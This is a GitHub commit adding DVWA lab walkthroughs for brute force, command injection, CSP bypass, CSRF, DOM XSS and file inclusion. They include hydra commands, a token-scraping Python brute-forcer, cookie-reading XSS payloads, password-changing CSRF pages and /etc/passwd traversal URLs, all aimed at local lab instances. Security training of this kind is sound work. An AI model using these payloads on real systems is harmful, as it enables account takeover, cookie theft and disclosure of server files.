Skip to content

Commit

Permalink
add files
Browse files Browse the repository at this point in the history
  • Loading branch information
@Aftab700
Aftab700 committed Feb 5, 2024
1 parent 9ef0a93 commit d57f8cc
Show file tree
Hide file tree
Showing 13 changed files with 935 additions and 0 deletions.
143 changes: 143 additions & 0 deletions Brute_Force.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,143 @@
# Brute Force


The goal is to brute force an HTTP login page.

**Security level is currently: low.**

On submitting the username and password we see that it is using get request

<img width="477" alt="image" src="https://user-images.githubusercontent.com/79740895/185153021-af373095-102b-4d68-88c7-573499351bc5.png">

So let’s use hydra for brute force:

```
hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=rt5o26sooph0v8p5nuarofj346"
```

Here we are using cookies because if we are not authenticated when we make the login attempts, we will be redirected to default login page.

<!-- {::options parse_block_html="true" /} -->

<details><summary markdown="span">Click to see output :diamond_shape_with_a_dot_inside: </summary>

```Shell
┌─[aftab@parrot]─[~/Downloads/dvwa]
└──╼ $hydra -l admin -P /usr/share/wordlists/rockyou.txt 127.0.0.1 http-get-form "/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=rt5o26sooph0v8p5nuarofj346"
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-08-17 23:50:56
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get-form://127.0.0.1:80/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:Username and/or password incorrect.:H=Cookie: security=low; PHPSESSID=rt5o26sooph0v8p5nuarofj346
[80][http-get-form] host: 127.0.0.1 login: admin password: password
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-08-17 23:51:59

```

</details>

<!-- {::options parse_block_html="false" /} -->

Login credentials found by hydra:
`admin:password`

<br/>

**Security level is currently: medium.**


It is still using get request.

so lets use hydra again:
```
hydra -l admin -P /usr/share/wordlists/rockyou.txt 'http-get-form://127.0.0.1/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome:H=Cookie\: PHPSESSID=j422143437vlsdgqs0t1385420; security=medium'
```
it still work but this time attack takes significantly longer then before.

on analyzing the login functionality we notice that the response is delayed by 2 or 3 seconds on wrong attempt.

<details><summary markdown="span">Click to see output :diamond_shape_with_a_dot_inside: </summary>

```Shell
┌─[aftab@parrot]─[~/Downloads/dvwa]
└──╼ $hydra -l admin -P /usr/share/wordlists/rockyou.txt 'http-get-form://127.0.0.1/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome:H=Cookie\: PHPSESSID=j422143437vlsdgqs0t1385420; security=medium'
Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-08-18 09:17:45
[INFORMATION] escape sequence \: detected in module option, no parameter verification is performed.
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-get-form://127.0.0.1:80/vulnerabilities/brute/:username=^USER^&password=^PASS^&Login=Login:S=Welcome:H=Cookie\: PHPSESSID=j422143437vlsdgqs0t1385420; security=medium
[80][http-get-form] host: 127.0.0.1 login: admin password: password
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-08-18 09:18:50

```

</details>

<br/>

**Security level is currently: high.**

It's still get request but this time one additional parameter `user_token`

It's using CSRF token so hydra wont help, let's use python this time.

<details><summary markdown="span">Click to see python code :diamond_shape_with_a_dot_inside: </summary>

```python
import requests
from bs4 import BeautifulSoup
from requests.structures import CaseInsensitiveDict

url = 'http://127.0.0.1/vulnerabilities/brute/'

headers = CaseInsensitiveDict()
headers["Cookie"] = "security=high; PHPSESSID=j422143437vlsdgqs0t1385420"

r = requests.get(url, headers=headers)

r1 = r.content
soup = BeautifulSoup(r1, 'html.parser')
user_token = soup.findAll('input', attrs={'name': 'user_token'})[0]['value']

with open("/usr/share/wordlists/rockyou.txt", 'rb') as f:
for i in f.readlines():
i = i[:-1]
try:
a1 = i.decode()
except UnicodeDecodeError:
print(f'can`t decode {i}')
continue

r = requests.get(
f'http://127.0.0.1/vulnerabilities/brute/?username=admin&password={a1}&Login=Login&user_token={user_token}#',
headers=headers)
r1 = r.content
soup1 = BeautifulSoup(r1, 'html.parser')
user_token = soup1.findAll('input', attrs={'name': 'user_token'})[0]['value']
print(f'checking {a1}')
if 'Welcome' in r.text:
print(f'LoggedIn: username: admin , password:{a1} ===found===')
break
```

</details>

<details><summary markdown="span">Click to see output :diamond_shape_with_a_dot_inside: </summary>

```Shell
┌─[aftab@parrot]─[~/Downloads/dvwa]
└──╼ $python brute_high.py
checking 123456
checking 12345
checking 123456789
checking password
LoggedIn: username: admin , password:password ===found===
```

</details>

<br/>
24 changes: 24 additions & 0 deletions Command_Injection.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,24 @@
# Command Injection

<img width="467" alt="image" src="https://user-images.githubusercontent.com/79740895/185295923-7a149c9d-8f1e-4262-ae0a-3884514462ac.png">

we are given with functionality to ping device. we give ip or domain to ping:

input: localhost

output:

<img width="463" alt="image" src="https://user-images.githubusercontent.com/79740895/185296846-d2795040-d782-4d85-af22-5197875b0f91.png">

This is about command injection so backend must be appending our input ping command.

we can give our arbitrary command to execute with the help of pipe `|` ,so let's create a simple payload :
```
|ls
```

<img width="467" alt="image" src="https://user-images.githubusercontent.com/79740895/185297755-e48d1fc7-cccd-4a81-acf3-3558ffb70366.png">

_it works on all low, medium and high_

<br/>
28 changes: 28 additions & 0 deletions Content_Security_Policy_(CSP)_Bypass.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
# Content Security Policy (CSP) Bypass



**Security level is currently: low.**

from CSP we can import script from pastebin.com, so let's put our script on pastebin and include that link:

payload=`https://pastebin.com/dl/Lnamji4V`

this JavaScript is executed on page.


**Security level is currently: medium.**

It's using nonce to prevent execution of JavaScript includ but this value is static so we can add this to our payload:

nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=

payload=`<script nonce="TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=">alert(document.cookie)</script>`

**Security level is currently: high.**

It is making request to `http://192.168.170.131/vulnerabilities/csp/source/jsonp.php?callback=solveSum` to solve this lab we have to intercept this request
and anything we set to callback's value wil be executed so we can modify it to `callback=alert(document.cookie);` and alert will pop up.


<br/>
104 changes: 104 additions & 0 deletions Cross_Site_Request_Forgery_(CSRF).md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,104 @@
# Cross Site Request Forgery (CSRF)

**Security level is currently: low.**

<img width="827" alt="image" src="https://user-images.githubusercontent.com/79740895/185393318-096ce7f2-f881-4aee-ba63-1a6c2074fb52.png">

Here we can change password, there is no csrf protection. We can create simple form to auto submit and change password of victim.

<details><summary markdown="span">Click to see html code for CSRF :diamond_shape_with_a_dot_inside: </summary>

```html
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://192.168.170.131/vulnerabilities/csrf/">
<input type="hidden" name="password&#95;new" value="pass" />
<input type="hidden" name="password&#95;conf" value="pass" />
<input type="hidden" name="Change" value="Change" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
```

</details>

we can host this page so when victim visit page their password will automatically change.

I'm using python to host webpage:

<details><summary markdown="span">Click to see output :diamond_shape_with_a_dot_inside: </summary>

```Shell
C:\Users\AFTAB SAMA\Downloads>python -m http.server 80
Serving HTTP on :: port 80 (http://[::]:80/) ...
::ffff:192.168.173.222 - - [18/Aug/2022 18:03:11] "GET /csrf-test.html HTTP/1.1" 200 -
::ffff:192.168.173.222 - - [18/Aug/2022 18:03:12] code 404, message File not found
::ffff:192.168.173.222 - - [18/Aug/2022 18:03:12] "GET /favicon.ico HTTP/1.1" 404 -
```

</details>



**Security level is currently: medium.**

Same attack won't work, looking at sourcecode we know that server checks where the request came from.

<img width="333" alt="image" src="https://user-images.githubusercontent.com/79740895/185403021-db671fc3-c08d-47e2-8a8f-fdb639e50e90.png">

one way to get around is if we can upload our file in server.

Now first of all change csrf.html into csrf.php file, then set low security level and switch into file uploading vulnerability inside DVWA.

Here the above text file of html form is now saved as csrf.php is successfully uploaded in the server which you can see from given screenshot.

<img width="468" alt="image" src="https://user-images.githubusercontent.com/79740895/185402657-d1e47dc3-2884-4619-a5a6-5dafbe459a68.png">

now we can use this new url: `http://192.168.170.131/hackable/uploads/csrf.php`

password changed.



**Security level is currently: high.**

This time it use csrf token. we can read this token if we have same origin and we can do that by uploading our payload to server as shown previously.

upload this code to server:

<details><summary markdown="span">Click to see code :diamond_shape_with_a_dot_inside: </summary>

```html
<html>
<body>
<p>TOTALLY LEGITIMATE AND SAFE WEBSITE </p>
<iframe id="myFrame" src="http://192.168.170.131/vulnerabilities/csrf" style="visibility: hidden;" onload="maliciousPayload()"></iframe>
<script>
function maliciousPayload() {
console.log("start");
var iframe = document.getElementById("myFrame");
var doc = iframe.contentDocument || iframe.contentWindow.document;
var token = doc.getElementsByName("user_token")[0].value;
const http = new XMLHttpRequest();
const url = "http://192.168.170.131/vulnerabilities/csrf/?password_new=hackerman&password_conf=hackerman&Change=Change&user_token="+token+"#";
http.open("GET", url);
http.send();
console.log("password changed");
}
</script>
</body>
</html>
```

</details>

on visiting this url it will read token from DOM and create password change request to server.

<img width="478" alt="image" src="https://user-images.githubusercontent.com/79740895/185408922-c1d9e774-3e43-4170-bcda-3c0269fc6260.png">

<br/>
29 changes: 29 additions & 0 deletions DOM_Based_Cross_Site_Scripting_(XSS).md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,29 @@
# DOM Based Cross Site Scripting (XSS)


**Security level is currently: low.**


We have option to select language and value is reflected in GET parameter default=English

payload=`<script>alert(document.cookie);</script>`

using this it will trigger an alert pop up with cookie values.


**Security level is currently: medium.**

we are stuck inside option tag so we have escape that and we can't use script tag because that is blocked so we use image tag.

payload=`" ></option></select><img src=x onerror="alert(document.cookie)">`


**Security level is currently: high.**

This time server is using whitelist we can bypass that by puting our payload after `#` because anything after `#` is not sent to
server but still reflecting on the page.

payload=`#<script>alert(document.cookie);</script>`


<br/>
28 changes: 28 additions & 0 deletions File_Inclusion.md
View file
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
# File Inclusion

**Security level is currently: low.**

In url there is GET parameter `page` used for including file.

url:`http://192.168.170.131/vulnerabilities/fi/?page=include.php`

By changing this file location we can read file on server.

url:`http://192.168.170.131/vulnerabilities/fi/?page=/etc/passwd`

<img width="658" alt="image" src="https://user-images.githubusercontent.com/79740895/185410392-bf62fdae-c6c7-4f90-a934-191ffadcf471.png">


_Also work for medium_

**Security level is currently: high.**

we have one condition that file name should start with `file`.

<img width="343" alt="image" src="https://user-images.githubusercontent.com/79740895/185414371-f1a0cb44-0688-40ab-ae49-1c623e19744f.png">

we can bypass that with payload:`file/../../../../../../etc/passwd` path traversal.

<img width="456" alt="image" src="https://user-images.githubusercontent.com/79740895/185414731-fda51955-9d13-4b60-893a-f700f29021eb.png">

<br/>
Loading

0 comments on commit d57f8cc

Please sign in to comment.